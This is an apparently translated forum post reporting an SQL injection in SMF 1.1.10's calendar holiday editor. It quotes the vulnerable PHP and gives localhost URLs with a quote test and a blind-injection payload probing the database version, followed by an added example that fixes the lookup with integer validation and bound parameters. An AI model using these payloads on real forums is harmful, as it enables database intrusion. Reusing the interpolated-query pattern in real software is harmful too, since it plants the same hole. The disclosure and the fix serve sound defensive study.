SMF 1.1.10
AUTHOR: HAXTA4OK
Admin rights are required.
Code:
function EditHoliday()
{
    global $txt, $context, $db_prefix, $scripturl;
    loadTemplate('ManageCalendar');
    $context['is_new'] = !isset($_REQUEST['holiday']);
    $context['page_title'] = $context['is_new'] ? $txt['holidays_add'] : $txt['holidays_edit'];
    $context['sub_template'] = 'edit_holiday';
    $context['admin_tabs']['tabs']['holidays']['is_selected'] = true;
    // Submitting?
    if (isset($_POST['sc']) && (isset($_REQUEST['delete']) || $_REQUEST['title'] != ''))
    {
        checkSession();
        if (isset($_REQUEST['delete']))
            db_query("
                DELETE FROM {$db_prefix}calendar_holidays
                WHERE ID_HOLIDAY = $_REQUEST[holiday]", __FILE__, __LINE__);
        else
        {
            $date = strftime($_REQUEST['year'] <= 4 ? '0004-%m-%d' : '%Y-%m-%d', mktime(0, 0, 0, $_REQUEST['month'], $_REQUEST['day'], $_REQUEST['year']));
            if (isset($_REQUEST['edit']))
                db_query("
                    UPDATE {$db_prefix}calendar_holidays
                    SET eventDate = '$date', title = '$_REQUEST[title]'
                    WHERE ID_HOLIDAY = $_REQUEST[holiday]", __FILE__, __LINE__);
            else
                db_query("
                    INSERT INTO {$db_prefix}calendar_holidays
                        (eventDate, title)
                    VALUES
                        ('$date', SUBSTRING('$_REQUEST[title]', 1, 48))", __FILE__, __LINE__);
        }
        updateStats('calendar');
        redirectexit('action=managecalendar;sa=holidays');
    }
    // Default states...
    if ($context['is_new'])
        $context['holiday'] = array(
            'id' => 0,
            'day' => date('d'),
            'month' => date('m'),
            'year' => '0000',
            'title' => ''
        );
    // If it's not new load the data.
    else
    {
        $request = db_query("
            SELECT ID_HOLIDAY, YEAR(eventDate) AS year, MONTH(eventDate) AS month, DAYOFMONTH(eventDate) AS day, title
            FROM {$db_prefix}calendar_holidays
            WHERE ID_HOLIDAY = $_REQUEST[holiday]
            LIMIT 1", __FILE__, __LINE__);
        while ($row = mysql_fetch_assoc($request))
            $context['holiday'] = array(
                'id' => $row['ID_HOLIDAY'],
                'day' => $row['day'],
                'month' => $row['month'],
                'year' => $row['year'] <= 4 ? 0 : $row['year'],
                'title' => $row['title']
            );
        mysql_free_result($request);
    }
    // Last day for the drop down?
    $context['holiday']['last_day'] = (int) strftime('%d', mktime(0, 0, 0, $context['holiday']['month'] == 12 ? 1 : $context['holiday']['month'] + 1, 0, $context['holiday']['month'] == 12 ? $context['holiday']['year'] + 1 : $context['holiday']['year']));
}
The vulnerable spot is holiday.
=) And here is the example itself:
http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;holiday=5
Implementation:
http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;holiday=5'
We find out the number of columns: there are 5.
Based on GREY's posts, we make the query:
http://127.0.0.1/110/index.php?action=managecalendar;sa=editholiday;holiday=5+and+(%23)%0Asubstring(version(),1,1)=5
I have the 5 branch.
P.S. Please don't be too hard on me, this is my first bug found in SMF.
Last edited by HAXTA4OK; 23.08.2009 at 18:58.
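The following is an added example, not part of the original post and not SMF's own code: it shows the holiday lookup with the id validated as an integer and passed as a bound parameter, run against the holiday values quoted in the post. Assumptions: PDO with an in-memory SQLite database stands in for SMF's db_query()/MySQL layer, and the helper names holidayId() and loadHoliday() are hypothetical.

```php
<?php
// Added example, not SMF code. Assumption: PDO + in-memory SQLite stands in
// for SMF's db_query()/MySQL layer; table and column names follow the post.

// Accept only a positive decimal integer; anything else is rejected, not "cleaned".
function holidayId($raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Load one holiday with the id passed as a bound parameter, never interpolated.
function loadHoliday(PDO $db, $raw): ?array
{
    $id = holidayId($raw);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare(
        'SELECT ID_HOLIDAY, eventDate, title FROM calendar_holidays WHERE ID_HOLIDAY = :id LIMIT 1'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE calendar_holidays (ID_HOLIDAY INTEGER PRIMARY KEY, eventDate TEXT, title TEXT)');
$db->exec("INSERT INTO calendar_holidays VALUES (5, '0004-01-01', 'New Year')"); // constructed row

// Constructed inputs: a valid id and the two holiday values from the post (URL-decoded).
$samples = ['5', "5'", "5 and (#)\nsubstring(version(),1,1)=5"];
foreach ($samples as $raw) {
    $row = loadHoliday($db, $raw);
    printf("%-45s => %s\n", json_encode($raw), $row ? $row['title'] : 'rejected');
}
```

The same validation applies to the DELETE and UPDATE branches of the function, where holiday is interpolated in the same way; the title value in those queries would likewise go through a bound parameter.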